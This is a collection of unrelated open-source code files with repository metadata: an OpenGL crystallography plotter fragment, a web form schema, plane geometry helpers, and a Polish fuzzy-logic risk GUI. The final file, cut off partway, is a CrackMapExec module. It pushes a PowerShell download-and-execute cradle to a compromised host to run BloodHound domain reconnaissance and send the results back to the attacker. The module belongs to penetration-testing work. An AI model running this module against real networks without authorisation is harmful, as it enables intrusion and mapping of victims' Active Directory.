GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_CLAMP)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_CLAMP)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
GL.glTexEnvf(GL.GL_TEXTURE_ENV, GL.GL_TEXTURE_ENV_MODE, GL.GL_DECAL)
GL.glEnable(GL.GL_TEXTURE_2D)
GL.glEnable(GL.GL_NORMALIZE)
GL.glShadeModel(GL.GL_FLAT)
def scorecolor(self,i=0):
cc = [ [ 1,0,0] , [0,1,0] , [0,0,1], [1,1,0], [1,0,1], [0,1,1],
[ 0.5,0,0] , [0,0.5,0] , [0,0,0.5], [0.5,0.5,0], [0.5,0,0.5],
[0,0.5,0.5]]
if self.ubis is not None:
from ImageD11 import indexing
for u,i in zip(self.ubis,list(range(len(self.ubis)))):
scores=indexing.calc_drlv2(u,self.xyz)
print(self.xyz.shape,scores.shape)
ind = numpy.compress( numpy.less(scores,0.02) ,
numpy.arange(self.xyz.shape[0]) )
print("Grain",i,scores.shape,ind.shape)
for j in range(3):
c=numpy.ones(self.color.shape[0])
numpy.put(c,ind,cc[i%len(cc)][j])
self.color[:,j]*=c
def go(self):
"""
Allow the toplevel to return a handle for changing data
"""
self.o.mainloop()
def goaway(self):
print("Called goaway")
self.o.destroy()
self.destroy()
if self.parent is None: sys.exit()
print("Ought to be gone now...")
def changedata(self,xyz=None):
if xyz is not None:
self.xyz=xyz.copy()
self.npeaks=xyz.shape[0]
GL.glDisableClientState(GL.GL_VERTEX_ARRAY)
GL.glDisableClientState(GL.GL_COLOR_ARRAY)
GL.glVertexPointer( 3, GL.GL_FLOAT, 0, self.xyz.astype(numpy.float32).tostring() )
GL.glColorPointer( 3, GL.GL_FLOAT, 0, self.color.astype(numpy.float32).tostring() )
GL.glEnableClientState(GL.GL_VERTEX_ARRAY)
GL.glEnableClientState(GL.GL_COLOR_ARRAY)
self.o.tkRedraw()
def setps(self):
self.pointsize=float(self.ps.get())
self.o.tkRedraw()
def redraw(self,o):
GL.glDisable(GL.GL_LIGHTING)
GL.glClearColor(0., 0., 0., 0)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glColor3f(1.0, 1.0, 1.0) # white
GL.glPointSize(self.pointsize)
GL.glDrawArrays(GL.GL_POINTS, 0, self.npeaks )
if self.ubis is not None and len(self.ubis)==1:
hkl = numpy.dot(numpy.linalg.inv(self.ubis[0]),
numpy.identity(3,numpy.float)).T
# print hkl
else:
hkl = numpy.identity(3,numpy.float)
# print hkl
GL.glBegin(GL.GL_LINE_LOOP)
GL.glColor3f(1.0, 0.0, 0.0) # red
GL.glVertex3f(0.,0.,0.)
GL.glVertex3f(hkl[0][0],hkl[0][1],hkl[0][2])
GL.glEnd()
GL.glBegin(GL.GL_LINE_LOOP)
GL.glColor3f(0.0, 1.0, 0.0) # green
GL.glVertex3f(0.,0.,0.)
GL.glVertex3f(hkl[1][0],hkl[1][1],hkl[1][2])
GL.glEnd()
GL.glBegin(GL.GL_LINE_LOOP)
GL.glColor3f(0.0, 0.0, 1.0) # blue
GL.glVertex3f(0.,0.,0.)
GL.glVertex3f(hkl[2][0],hkl[2][1],hkl[2][2])
GL.glEnd()
if self.tex:
# print "drawing images"
GL.glEnable(GL.GL_TEXTURE_2D)
GL.glColor4f(.0, 1.0, .0, 1.0) # red
GL.glBegin(GL.GL_QUADS)
# generate a grid of squares to map the texture in 3D
# opengl has better "map" methods to do this
for i,j,g1,g2,g3 in self.pts:
# print i,j,g1,g2,g3
GL.glTexCoord2f(i,j)
GL.glVertex3f(g1, g2, g3)
GL.glEnd()
# GL.glDisable(GL.GL_TEXTURE_2D)
GL.glFlush()
GL.glEnable(GL.GL_LIGHTING)
if __name__=="__main__":
try:
lines=open(sys.argv[1],"r").readlines()
except:
print("Usage %s gvector_file [ubifile] [image parfile]"%(sys.argv[0]))
raise
# sys.exit()
on=0
xyz=[]
for line in lines:
if on==1:
try:
vals=[float(x) for x in line.split()]
xyz.append( [ vals[0],vals[1],vals[2] ])
except:
pass
if line.find("xr yr zr")>0 or line.find("gx gy gz ")>0:
on=1
xyz=numpy.array(xyz)
if len(xyz) == 0 and lines[0][0]=="#":
from ImageD11 import columnfile
c = columnfile.columnfile( sys.argv[1] )
xyz = numpy.array( (c.gx, c.gy, c.gz )).T
npeaks = len(xyz)
if len(sys.argv)==3:
o=plot3d(None,data=xyz,ubis=sys.argv[2])
elif len(sys.argv)==6:
o=plot3d(None,data=xyz,ubis=sys.argv[2],image=sys.argv[3],pars=sys.argv[4],spline=sys.argv[5])
else:
o=plot3d(None,data=xyz,ubis=None)
def runit():
o.changedata(o.xyz)
o.after(100, runit )
o.mainloop()
| gpl-2.0 | 4,887,040,685,764,493,000 | 34.37574 | 127 | 0.554738 | false | 3.042494 | false | false | false |
dpausp/arguments | src/ekklesia_portal/concepts/proposition_note/proposition_note_contracts.py | 1 | 1147 | from colander import Length
from deform import Button
from deform.widget import HiddenWidget, Select2Widget, TextAreaWidget
from ekklesia_common.contract import Form, Schema, enum_property, int_property, string_property
from ekklesia_common.translation import _
from ekklesia_portal.enums import VoteByUser
class PropositionNoteSchema(Schema):
proposition_id = string_property(title=_('proposition_id'), missing=None)
user_id = int_property(title=_('user_id'), missing=None)
notes = string_property(title=_('notes'), validator=Length(min=0, max=2048), missing=None)
vote = enum_property(VoteByUser, title=_('vote'), missing=VoteByUser.UNSURE)
class PropositionNoteForm(Form):
def __init__(self, request, action):
super().__init__(PropositionNoteSchema(), request, action, buttons=[Button(title=_("submit"))])
def prepare_for_render(self, items_for_selects):
self.set_widgets({
'proposition_id': HiddenWidget(),
'user_id': HiddenWidget(),
'notes': TextAreaWidget(rows=8, missing=None),
'vote': Select2Widget(values=items_for_selects['vote'])
})
| agpl-3.0 | -2,293,608,169,246,230,800 | 39.964286 | 103 | 0.699215 | false | 3.688103 | false | false | false |
PhloxAR/math3 | math3/funcs/plane.py | 1 | 4685 | # -*- coding: utf-8 -*-
"""
Provide functions for the creation and manipulation of Planes.
Planes are represented using a numpy.array of shape (4,).
The values represent the plane equation using the values A,B,C,D.
The first three values are the normal vector.
The fourth value is the distance of the plane from the origin, down the normal.
.. seealso: http://en.wikipedia.org/wiki/Plane_(geometry)
.. seealso: http://mathworld.wolfram.com/Plane.html
"""
from __future__ import absolute_import, division, print_function
import numpy as np
from math3 import vector
from math3.utils import all_parameters_as_numpy_arrays, parameters_as_numpy_arrays
def create(normal=None, distance=0.0, dtype=None):
"""Creates a plane that runs along the X,Y plane.
It crosses the origin with a normal of 0,0,1 (+Z).
:rtype: numpy.array
:return: A plane that runs along the X,Y plane.
"""
if normal is None:
normal = [0.0, 0.0, 1.0]
return np.array([normal[0], normal[1], normal[2], distance], dtype=dtype)
@parameters_as_numpy_arrays('vector1', 'vector2', 'vector3')
def create_from_points(vector1, vector2, vector3, dtype=None):
"""Create a plane from 3 co-planar vectors.
The vectors must all lie on the same
plane or an exception will be thrown.
The vectors must not all be in a single line or
the plane is undefined.
The order the vertices are passed in will determine the
normal of the plane.
:param numpy.array vector1: a vector that lies on the desired plane.
:param numpy.array vector2: a vector that lies on the desired plane.
:param numpy.array vector3: a vector that lies on the desired plane.
:raise ValueError: raised if the vectors are co-incident (in a single line).
:rtype: numpy.array
:return: A plane that contains the 3 specified vectors.
"""
dtype = dtype or vector1.dtype
# make the vectors relative to vector2
relV1 = vector1 - vector2
relV2 = vector3 - vector2
# cross our relative vectors
normal = np.cross(relV1, relV2)
if np.count_nonzero(normal) == 0:
raise ValueError("Vectors are co-incident")
# create our plane
return create_from_position(position=vector2, normal=normal, dtype=dtype)
@parameters_as_numpy_arrays('position', 'normal')
def create_from_position(position, normal, dtype=None):
"""Creates a plane at position with the normal being above the plane
and up being the rotation of the plane.
:param numpy.array position: The position of the plane.
:param numpy.array normal: The normal of the plane. Will be normalised
during construction.
:rtype: numpy.array
:return: A plane that crosses the specified position with the specified
normal.
"""
dtype = dtype or position.dtype
# -d = a * px + b * py + c * pz
n = vector.normalise(normal)
d = -np.sum(n * position)
return create(n, d, dtype)
def create_xy(invert=False, distance=0., dtype=None):
"""Create a plane on the XY plane, starting at the origin with +Z being
the up vector.
The distance is the distance along the normal (-Z if inverted, otherwise +Z).
"""
invert = -1. if invert else 1.
return np.array([0., 0., 1. * invert, distance])
def create_xz(invert=False, distance=0., dtype=None):
"""Create a plane on the XZ plane, starting at the origin with +Y being
the up vector.
The distance is the distance along the normal (-Y if inverted, otherwise +Y).
"""
invert = -1. if invert else 1.
return np.array([0., 1. * invert, 0., distance])
def create_yz(invert=False, distance=0., dtype=None):
"""Create a plane on the YZ plane, starting at the origin with +X being
the up vector.
The distance is the distance along the normal (-X if inverted, otherwise +X).
"""
invert = -1. if invert else 1.
return np.array([1. * invert, 0., 0., distance])
def invert_normal(plane):
"""Flips the normal of the plane.
The plane is **not** changed in place.
:rtype: numpy.array
:return: The plane with the normal inverted.
"""
# flip the normal, and the distance
return -plane
def position(plane):
"""Extracts the position vector from a plane.
This will be a vector co-incident with the plane's normal.
:param numpy.array plane: The plane.
:rtype: numpy.array
:return: A valid position that lies on the plane.
"""
return plane[:3] * plane[3]
def normal(plane):
"""Extracts the normal vector from a plane.
:param numpy.array plane: The plane.
:rtype: numpy.array
:return: The normal vector of the plane.
"""
return plane[:3].copy()
| bsd-3-clause | 8,162,852,061,869,322,000 | 30.655405 | 82 | 0.677268 | false | 3.709422 | false | false | false |
m-kostrzewa/FuzzyCarRisk | gui.py | 1 | 16811 | #!/usr/bin/env python3
"""
author: Kamil Cukrowski, 2016
"""
from tkinter import *
import tkinter
import tkinter.ttk
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
import numpy as np
import inference
import fuzzy_sets
from matplotlib import cm
import random
class guiOnButtonDefuzyfikacja(tkinter.Tk):
def __init__(self, parent):
self.parent = parent
def show(self, frame):
self.frame = frame
self.parent.resetFrame(frame)
##
interfere_functext = self.convertInferenceFuncToText(self.parent.ruleset.inference_func)
##
f = Frame(frame)
f.place(in_=frame, anchor="c", relx=.5, rely=.5)
##
l=tkinter.Label(f, text='Deffuzifikacja aktualna: '+interfere_functext, justify=LEFT)
l.grid(row=0,column=0,columnspan=3)
##
tkinter.Label(f, text='Ustaw deffuzifikacje: ').grid(row=1,column=0)
list=['COG','LOM','MOM','FOM']
inference_func = StringVar()
inference_func.set(interfere_functext)
tkinter.OptionMenu(f,inference_func,*list).grid(row=1,column=1)
##
b=tkinter.Button(f, text="Ustaw", command= lambda: self.OnButtonRegulyOdswierz(inference_func.get()))
b.grid(row=1,column=2)
def OnButtonRegulyOdswierz(self,text):
self.parent.ruleset.inference_func = self.convertTextToInferenceFunc(text)
self.show(self.frame)
def convertTextToInferenceFunc(self, text):
if ( text == 'COG' ):
return inference.cog
if ( text == 'MOM' ):
return inference.mom
if ( text == 'LOM' ):
return inference.lom
if ( text == 'FOM' ):
return inference.fom
raise ValueError('unexistent inference function : '+text)
def convertInferenceFuncToText(self, inference_func):
if ( inference_func == inference.cog ):
return 'COG'
if ( inference_func == inference.mom ):
return 'MOM'
if ( inference_func == inference.lom ):
return 'LOM'
if ( inference_func == inference.fom ):
return 'FOM'
raise ValueError('unexistent inference function : '+inference_func)
class guiOnButtonReguly(tkinter.Tk):
def __init__(self, parent):
self.parent = parent
def show(self, frame):
self.parent.resetFrame(frame)
self.frame = frame
##
frame.update()
top = Frame(frame, width = frame.winfo_width(), height = frame.winfo_height()-50)
top.pack(side=TOP, fill=BOTH, expand=True)
b1 = Frame(frame, width = frame.winfo_width(), height = 20)
b1.pack(side=BOTTOM, fill=X)
b1.pack_propagate(False)
b2 = Frame(frame, width = frame.winfo_width(), height = 20)
b2.pack(side=BOTTOM, fill=X)
b2.pack_propagate(False)
##
tkinter.Label(top, text='Reguły:').pack()
view = Frame(top)
view.pack(fill=BOTH, expand=True)
S = Scrollbar(view)
T = Text(view, width=1000)
S.pack(side=RIGHT, fill=BOTH, expand=True)
T.pack(side=LEFT, fill=BOTH, expand=True)
S.config(command=T.yview)
T.config(yscrollcommand=S.set)
self.T = T
self.refreshText()
##
tkinter.Label(b1, text='Usuń regułę numer: ').pack(side=LEFT)
e = StringVar(); e.set('1');
tkinter.Entry(b1, textvariable=e).pack(side=LEFT)
tkinter.Button(b1, text='usuń', command= lambda: self.onButtonUsunRegule(e)).pack(side=LEFT)
##
tkinter.Label(b2, text='Jeśli prędkość jest ').pack(side=LEFT)
v1 = self.addOptionMenu(b2, self.parent.dom_predkosc);
tkinter.Label(b2, text=' i widocznosc jest ').pack(side=LEFT)
v2 = self.addOptionMenu(b2, self.parent.dom_widocznosc);
tkinter.Label(b2, text=' i przyczepnosc jest ').pack(side=LEFT)
v3 = self.addOptionMenu(b2, self.parent.dom_przyczepnosc);
tkinter.Label(b2, text=' to ryzyko jest ').pack(side=LEFT)
v4 = self.addOptionMenu(b2, self.parent.dom_ryzyko);
tkinter.Button(b2, text='dodaj regułę',command= lambda: self.onButtonDodajRegule(v1.get(),v2.get(),v3.get(),v4.get())).pack(side=LEFT)
def refreshText(self):
self.T.delete("1.0", END)
self.T.insert(END, self.rulesString())
def addOptionMenu(self, frame, domain):
list_=[]
for fuzzyset in domain.fuzzy_sets:
list_.append(fuzzyset.name)
var = StringVar()
var.set(list_[0])
tkinter.OptionMenu(frame,var,*list_).pack(side=LEFT)
return var
def onButtonDodajRegule(self, predkosc, widocznosc, przyczepnosc, ryzyko):
self.parent.ruleset.add_rule_in_order([predkosc,widocznosc,przyczepnosc,ryzyko])
self.refreshText()
def onButtonUsunRegule(self, entry):
num = int(entry.get());
if num < 1 | num > len(ruleset.rules):
return
del self.parent.ruleset.rules[num-1]
self.refreshText()
def rulesString(self):
ruleset = self.parent.ruleset
string=""
for j in range(len(ruleset.rules)):
rule = ruleset.rules[j]
string += '%2d'%(j+1)+". Jeśli "
for i in range(len(ruleset.domains)-1):
string += ruleset.domains_list[i].linguistic_name+" jest "+rule.input_sets[i].name + " i "
string = string[:-3]; # remove last ' i '
i=-1;
string += " to "+ruleset.domains_list[i].linguistic_name+" jest "+rule.output_set.name+'\n';
return string
class guiOnButtonFPrzynaleznosci(tkinter.Tk):
def __init__(self, parent):
self.parent = parent
##
self.fuzzyName = ""
self.fuzzyNameList = ""
##
self.fuzzyTypeList=[]
for type in ['trójkątna', 'prostokątna', 'trapezowa', 'Guassa']:
self.fuzzyTypeList.append(type)
self.fuzzyType = StringVar()
self.fuzzyType.set(self.fuzzyTypeList[0])
##
self.values=[]
for i in [0,1,2,3]:
e = StringVar()
e.set('0')
self.values.append( e )
def show(self, frame, dom):
self.frame = frame
self.dom = dom
##
self.parent.resetFrame(frame)
##
self.fuzzyNameList=[]
for fuzzyset in dom.fuzzy_sets:
self.fuzzyNameList.insert(0,fuzzyset.name)
self.fuzzyName = StringVar()
self.fuzzyName.set(self.fuzzyNameList[0])
##
frame.update()
top = Frame(frame, width = frame.winfo_width(), height = frame.winfo_height()-50)
top.pack(side=TOP, fill=BOTH)
top.pack_propagate(False)
bottom = Frame(frame, width = frame.winfo_width(), height = 50)
bottom.pack(side=BOTTOM, fill=BOTH)
top.pack_propagate(False)
# nasz plot
fig = plt.Figure(figsize=(15,15), dpi=60)
subplot = fig.add_subplot(1,1,1)
dom.addPlotsToSubplot(subplot)
canvas = FigureCanvasTkAgg(fig, top)
toolbar = NavigationToolbar2TkAgg(canvas, top)
toolbar.pack(side=TOP, fill=BOTH)
canvas.get_tk_widget().pack(side=BOTTOM, fill=BOTH)
# i dziubki do edycji!
tkinter.Label(bottom,text="Funkcja do edycji:").grid(column=0,row=0)
tkinter.OptionMenu(bottom,self.fuzzyName,*self.fuzzyNameList).grid(column=0,row=1)
tkinter.Label(bottom,text="Kształt funkcji").grid(column=1,row=0)
tkinter.OptionMenu(bottom,self.fuzzyType,*self.fuzzyTypeList).grid(column=1,row=1)
tkinter.Label(bottom,text="Wartości punktów").grid(column=2,row=0,columnspan=5)
for i in range(0,len(self.values)):
tkinter.Entry(bottom, textvariable=self.values[i], width=5).grid(column=2+i,row=1)
b=tkinter.Button(bottom, text="Odśwież",
command= lambda: self.onButtonFPrzynaleznosciOdswierz(dom, self.fuzzyName.get(), self.fuzzyType.get(), self.values))
b.grid(column=7,row=1)
def refresh(self):
return self.show(self.frame, self.dom)
def onButtonFPrzynaleznosciOdswierz(self, dom, fuzzyName, fuzzyType, values):
val = []
for i in range(0, len(values)):
try:
val.append( float(values[i].get()) )
except ValueError:
print("Bad input")
return
old_set = dom.get_set(fuzzyName)
if fuzzyType == 'trójkątna':
f_set = fuzzy_sets.TriangleSet(old_set.range_min, val[0], val[1], val[2], old_set.range_max, old_set.name)
if fuzzyType == 'prostokątna':
f_set = fuzzy_sets.RectangleSet(old_set.range_min, val[0], val[1], old_set.range_max, old_set.name)
if fuzzyType == 'trapezowa':
f_set = fuzzy_sets.TrapezoidSet(old_set.range_min, val[0], val[1], val[2], val[3], old_set.range_max, old_set.name)
if fuzzyType == 'Guassa':
f_set = fuzzy_sets.GaussSet(old_set.range_min, val[0], val[1], old_set.range_max, old_set.name)
dom.change_set(fuzzyName, f_set)
self.refresh()
class guiOnButtonPlaszczyznaSterowan(tkinter.Tk):
def __init__(self, parent):
self.parent = parent
def show(self, frame):
frame.update()
top = Frame(frame, width = frame.winfo_width(), height = frame.winfo_height()-50)
top.pack(side=TOP, fill=BOTH)
top.pack_propagate(False)
bottom = Frame(frame, width = frame.winfo_width(), height = 50)
bottom.pack(side=BOTTOM, fill=Y)
bottom.pack_propagate(False)
##
tkinter.Label(bottom, text='Przyczepność: ').pack(side=LEFT)
tmp = self.parent.dom_przyczepnosc.fuzzy_sets[0]
scale = tkinter.Scale(bottom,
from_=tmp.range_min, to=tmp.range_max,
resolution=(tmp.range_max-tmp.range_min)/500,
orient=HORIZONTAL)
scale.pack(fill=X, expand=True, side=LEFT)
tkinter.Button(bottom, text='Rysuj', command= lambda: self.refreshPlot(top, scale.get())).pack(side=LEFT)
##
l=tkinter.Label(top, text=(
"Aby narysować wykres,\n"
"ustaw parametr przyczepność i wciśnij przycisk 'Rysuj'\n"
"\n"
"Generacja wykresu może trochę potrwać!\n"))
l.pack(fill=BOTH, expand=True, anchor=CENTER)
def refreshPlot(self, frame, przyczepnosc):
# draw 3d graph of 2 rule input 1 rule output
num_gridpoints = 25
vels = np.linspace(self.parent.dom_predkosc.fuzzy_sets[0].range_min,
self.parent.dom_predkosc.fuzzy_sets[0].range_max, num_gridpoints)
viss = np.linspace(self.parent.dom_widocznosc.fuzzy_sets[0].range_min,
self.parent.dom_widocznosc.fuzzy_sets[0].range_max, num_gridpoints)
vels, viss = np.meshgrid(vels, viss)
risks = np.ones((num_gridpoints, num_gridpoints))
inference = self.parent.ruleset.inference
for x in range(num_gridpoints):
for y in range(num_gridpoints):
risks[x, y] = inference([vels[x][y], viss[x][y], przyczepnosc])
fig = plt.figure(figsize=(15,15), dpi=60)
fig.canvas.set_window_title('Wykres 3D dla przyczepności = '+'%.2f'%przyczepnosc)
ax = fig.add_subplot(111,projection="3d")
ax.set_xlabel("Prędkość [km/h]")
ax.set_ylabel("Widoczność [km]")
ax.set_zlabel("Prawdopodobieństwo wypadku [%]")
ax.set_zlim([self.parent.dom_ryzyko.fuzzy_sets[0].range_min, self.parent.dom_ryzyko.fuzzy_sets[0].range_max]);
ax.plot_surface(vels, viss, risks, rstride=1, cstride=1, cmap=cm.coolwarm)
fig.show()
plt.show()
#~ self.parent.resetFrame(frame)
#~ canvas = FigureCanvasTkAgg(fig, frame)
#~ toolbar = NavigationToolbar2TkAgg(canvas, frame)
#~ toolbar.pack(side=TOP, fill=BOTH)
#~ canvas.get_tk_widget().pack(side=BOTTOM, fill=BOTH)
class guiOnButtonGeneratorLiczb():
def __init__(self,parent):
self.parent = parent;
self.predkosc = StringVar();
self.widocznosc = StringVar();
self.przyczepnosc = StringVar();
self.ryzyko = StringVar();
self.debug = StringVar();
def show(self, inframe):
frame = tkinter.Frame(inframe);
frame.place(in_=inframe, anchor="c", relx=.5, rely=.5);
tkinter.Label(frame,text="Wyznacz wyjście dla wejść:\n").grid(column=0, row=0, columnspan=2)
tkinter.Label(frame,text="Prędkość ").grid(column=0, row=1)
tkinter.Entry(frame, textvariable=self.predkosc).grid(column=1, row=1)
tkinter.Label(frame,text="Widoczność ").grid(column=0, row=2)
tkinter.Entry(frame, textvariable=self.widocznosc).grid(column=1, row=2)
tkinter.Label(frame,text="Przyczepność ").grid(column=0, row=3)
tkinter.Entry(frame, textvariable=self.przyczepnosc).grid(column=1, row=3)
tkinter.Label(frame,text="Prawdopodobieństwo wypadku ").grid(column=0, row=4)
tkinter.Entry(frame, textvariable=self.ryzyko).grid(column=1, row=4)
tkinter.Label(frame,text="\n").grid(column=0, row=5)
b=tkinter.Button(frame, text="Wygeneruj losowe wartości", command=self.onButtonWygeneruj)
b.grid(column=0, row=6)
b=tkinter.Button(frame,text="Wyznacz", command=self.onButtonWyznacz)
b.grid(column=1, row=6)
tkinter.Label(frame,textvariable=self.debug).grid(column=0, row=8,columnspan=2)
def myRandrange(self, fuzzy_set):
return round(fuzzy_set.range_min+random.random()*fuzzy_set.range_max, 3);
def onButtonWygeneruj(self):
fuzzy_set = self.parent.dom_predkosc.fuzzy_sets[0];
self.predkosc.set( self.myRandrange(fuzzy_set) );
fuzzy_set = self.parent.dom_widocznosc.fuzzy_sets[0];
self.widocznosc.set( self.myRandrange(fuzzy_set) );
fuzzy_set = self.parent.dom_przyczepnosc.fuzzy_sets[0];
self.przyczepnosc.set( self.myRandrange(fuzzy_set) );
self.ryzyko.set("");
def onButtonWyznacz(self):
try:
pre = float(self.predkosc.get());
fuzzy_set = self.parent.dom_predkosc.fuzzy_sets[0];
if pre < fuzzy_set.range_min or pre > fuzzy_set.range_max:
raise ValueError;
except ValueError:
self.debug.set('Zla wartosc predkości.');
return
try:
wid = float(self.widocznosc.get());
fuzzy_set = self.parent.dom_widocznosc.fuzzy_sets[0];
if wid < fuzzy_set.range_min or wid > fuzzy_set.range_max:
raise ValueError;
except ValueError:
self.debug.set('Zla wartosc widoczności.');
return
try:
prz = float(self.przyczepnosc.get());
fuzzy_set = self.parent.dom_przyczepnosc.fuzzy_sets[0];
if prz < fuzzy_set.range_min or prz > fuzzy_set.range_max:
raise ValueError;
except ValueError:
self.debug.set('Zla wartosc przyczepności.');
return
self.ryzyko.set( self.parent.ruleset.inference( [pre, wid, prz ] ) );
class gui(tkinter.Tk):
width=700
height=600
def __init__(self,parent,fuzzy_system):
tkinter.Tk.__init__(self,parent)
[dom_predkosc, dom_widocznosc, dom_przyczepnosc, dom_ryzyko, ruleset] = fuzzy_system
self.dom_predkosc = dom_predkosc
self.dom_widocznosc = dom_widocznosc
self.dom_przyczepnosc = dom_przyczepnosc
self.dom_ryzyko = dom_ryzyko
self.ruleset = ruleset
self.parent = parent
self.guiOnButtonFPrzynaleznosci = guiOnButtonFPrzynaleznosci(self)
self.guiOnButtonReguly = guiOnButtonReguly(self)
self.guiOnButtonPlaszczyznaSterowan = guiOnButtonPlaszczyznaSterowan(self)
self.guiOnButtonDefuzyfikacja = guiOnButtonDefuzyfikacja(self)
self.guiOnButtonGeneratorLiczb = guiOnButtonGeneratorLiczb(self)
self.initialize()
def initialize(self):
self.geometry('{}x{}'.format(self.width, self.height))
self.lf = Frame(self, bg = "light gray", width = 100, height = self.height)
self.lf.pack(side=LEFT, fill=Y, padx=1, pady=1)
self.initLeftFrame(self.lf)
self.rf = Frame(self, bg = "light gray", width = (self.width-100), height = self.height)
self.rf.pack(side=RIGHT, anchor=CENTER, expand=True, fill=BOTH, padx=3, pady=3)
quote=("Program zaliczeniowy na przedmiot PSZT.\n"
"\n\n\n\n\n"
"Wykonali: Kamila Cipior, Kamil Cukrowski, Michał Kostrzewa\n"
"Prowadząca: p. Joanna Panasiuk \n"
"Rok wykonania projektu: 2016\n")
l=tkinter.Label(self.rf,text=quote, justify=RIGHT, font=("Helvetica", 14))
l.pack(fill=BOTH, expand=True, anchor=CENTER)
def initLeftFrame(self,lf):
tkinter.Label(lf,text="\nMenu:\n\n-- Funkcje przynależności --").pack(fill=X)
tkinter.Button(lf,text="prędkość", command= lambda: self.onButtonFPrzynaleznosci(self.dom_predkosc)).pack(fill=X)
tkinter.Button(lf,text="widoczność", command= lambda: self.onButtonFPrzynaleznosci(self.dom_widocznosc)).pack(fill=X)
tkinter.Button(lf,text="przyczepność", command= lambda: self.onButtonFPrzynaleznosci(self.dom_przyczepnosc)).pack(fill=X)
tkinter.Button(lf,text="ryzyko", command= lambda: self.onButtonFPrzynaleznosci(self.dom_ryzyko)).pack(fill=X)
tkinter.Label(lf,text="\n").pack(fill=X)
tkinter.Label(lf,text="-- Reguły --").pack(fill=X)
tkinter.Button(lf,text="Wyświetl", command=self.OnButtonReguly).pack(fill=X)
tkinter.Button(lf,text="Defuzyfikacja", command=self.OnButtonDefuzyfikacja).pack(fill=X)
tkinter.Label(lf,text="\n").pack(fill=X)
tkinter.Label(lf,text="-- Wyostrzanie --").pack(fill=X)
tkinter.Button(lf,text="Wyostrzanie liczb", command=self.OnButtonGeneratorLiczb).pack(fill=X)
tkinter.Button(lf,text="Wykres 3D", command=self.OnButtonPlaszczyznaSterowan).pack(fill=X)
tkinter.Label(lf,text="\n").pack(fill=X)
def OnButtonDefuzyfikacja(self):
self.resetFrame(self.rf)
self.guiOnButtonDefuzyfikacja.show(self.rf)
def OnButtonPlaszczyznaSterowan(self):
self.resetFrame(self.rf)
self.guiOnButtonPlaszczyznaSterowan.show(self.rf)
def resetFrame(self,frame):
for widget in frame.winfo_children():
widget.destroy()
def OnButtonReguly(self):
self.resetFrame(self.rf)
self.guiOnButtonReguly.show(self.rf)
def onButtonFPrzynaleznosci(self,dom):
self.resetFrame(self.rf)
self.guiOnButtonFPrzynaleznosci.show(self.rf, dom)
def on_resize(self,event):
self.resetFrame(self.rf)
def OnButtonGeneratorLiczb(self):
self.resetFrame(self.rf)
self.guiOnButtonGeneratorLiczb.show(self.rf)
| mit | 5,256,334,183,655,911,000 | 35.63895 | 136 | 0.708612 | false | 2.529687 | false | false | false |
jorik041/CrackMapExec | cme/modules/bloodhound.py | 1 | 6435 | from cme.helpers.powershell import *
from cme.helpers.misc import validate_ntlm
from cme.helpers.logger import write_log
from sys import exit
class CMEModule:
'''
Executes the BloodHound recon script on the target and retreives the results onto the attackers' machine
2 supported modes :
CSV : exports data into CSVs on the target file system before retreiving them (NOT opsec safe)
Neo4j API : exports data directly to the Neo4j API (opsec safe)
Module by Waffle-Wrath
Bloodhound.ps1 script base : https://github.com/BloodHoundAD/BloodHound
'''
name = 'bloodhound'
description = 'Executes the BloodHound recon script on the target and retreives the results to the attackers\' machine'
supported_protocols = ['smb']
opsec_safe= False
multiple_hosts = False
def options(self, context, module_options):
'''
THREADS Max numbers of threads to execute on target (defaults to 20)
COLLECTIONMETHOD Method used by BloodHound ingestor to collect data (defaults to 'Default')
CSVPATH (optional) Path where csv files will be written on target (defaults to C:\)
NEO4JURI (optional) URI for direct Neo4j ingestion (defaults to blank)
NEO4JUSER (optional) Username for direct Neo4j ingestion
NEO4JPASS (optional) Pass for direct Neo4j ingestion
Give NEO4J options to perform direct Neo4j ingestion (no CSVs on target)
'''
self.threads = 3
self.csv_path = 'C:\\'
self.collection_method = 'Default'
self.neo4j_URI = ""
self.neo4j_user = ""
self.neo4j_pass = ""
if module_options and 'THREADS' in module_options:
self.threads = module_options['THREADS']
if module_options and 'CSVPATH' in module_options:
self.csv_path = module_options['CSVPATH']
if module_options and 'COLLECTIONMETHOD' in module_options:
self.collection_method = module_options['COLLECTIONMETHOD']
if module_options and 'NEO4JURI' in module_options:
self.neo4j_URI = module_options['NEO4JURI']
if module_options and 'NEO4JUSER' in module_options:
self.neo4j_user = module_options['NEO4JUSER']
if module_options and 'NEO4JPASS' in module_options:
self.neo4j_pass = module_options['NEO4JPASS']
if self.neo4j_URI != "" and self.neo4j_user != "" and self.neo4j_pass != "" :
self.opsec_safe= True
self.ps_script = obfs_ps_script('BloodHound-modified.ps1')
def on_admin_login(self, context, connection):
if self.neo4j_URI == "" and self.neo4j_user == "" and self.neo4j_pass == "" :
command = "Invoke-BloodHound -CSVFolder '{}' -Throttle '{}' -CollectionMethod '{}'".format(self.csv_path, self.threads, self.collection_method)
else :
command = 'Invoke-BloodHound -URI {} -UserPass "{}:{}" -Throttle {} -CollectionMethod {}'.format(self.neo4j_URI, self.neo4j_user, self.neo4j_pass, self.threads, self.collection_method)
launcher = gen_ps_iex_cradle(context, 'BloodHound-modified.ps1', command)
connection.ps_execute(launcher)
context.log.success('Executed launcher')
def on_request(self, context, request):
if 'BloodHound-modified.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script.encode())
context.log.success('Executing payload... this can take a few minutes...')
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.get('content-length'))
data = response.rfile.read(length).decode()
